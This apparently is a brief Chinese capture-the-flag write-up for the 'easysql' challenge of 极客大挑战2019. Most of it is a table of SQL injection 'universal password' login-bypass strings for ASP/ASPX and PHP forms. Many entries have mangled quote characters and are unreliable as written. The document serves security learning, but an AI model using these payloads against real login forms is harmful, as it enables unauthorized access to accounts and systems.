easysql
![[极客大挑战2019]easysql](/default/index/img?u=aHR0cHM6Ly9waWFuc2hlbi5jb20vaW1hZ2VzLzE5My81YjZhMWVhYzU1ZmM3MDI1OThhNTk0NDIyNzY0YzU3OS5KUEVH "[极客大挑战2019]easysql")
进入后这样的页面,正常用’会报错,然后用burp扫一下。
![[极客大挑战2019]easysql](/default/index/img?u=aHR0cHM6Ly9waWFuc2hlbi5jb20vaW1hZ2VzLzIxNC80MjhiNzE3NDQxZTBmNDM2ZmFjYzg0Mzc4NDYzNDk3Ni5KUEVH "[极客大挑战2019]easysql")
尽然就出来了!
原来要用万能密码就行了,现在总结一下 万能密码:
| asp |
aspx万能密码 |
| 1: |
"or “a”="a |
| 2: |
‘.).or.(’.a.’=’.a |
| 3: |
or 1=1– |
| 4: |
'or 1=1– |
| 5: |
a’or’ 1=1– |
| 6: |
"or 1=1– |
| 7: |
'or.‘a.’='a |
| 8: |
“or”="a’='a |
| 9: |
‘or’’=’ |
| 10: |
‘or’=‘or’ |
| 11: |
admin’or 1=1# |
| php |
PHP万能密码 |
| 1 |
'or 1=1/* |
| 2 |
"or “a”="a |
| 3 |
"or 1=1– |
| 4 |
“or”=" |
| 5 |
“or”="a’='a |
| 6 |
"or1=1– |
| 7 |
“or=or” |
| 8 |
'‘or’=‘or’ |
| 9 |
') or (‘a’='a |
| 10 |
‘.).or.(’.a.’=’.a |
| 11 |
'or 1=1 |
| 12 |
'or 1=1– |
| 13 |
'or 1=1/* |
| 14 |
‘or"="a’='a |
| 15 |
‘or’ ‘1’=‘1’ |
| 16 |
‘or’’=’ |
| 17 |
‘or’’=’‘or’’=’ |
| 18 |
‘or’=‘1’ |
| 19 |
‘or’=‘or’ |
| 20 |
'or.‘a.’='a |
| 21 |
'or1=1– |
| 22 |
1’or’1’='1 |
| 23 |
a’or’ 1=1– |
| 24 |
a’or’1=1– |
| 25 |
or ‘a’=‘a’ |
| 26 |
or 1=1– |
| 27 |
or1=1– |
| admin’/* |
密码*/’ |
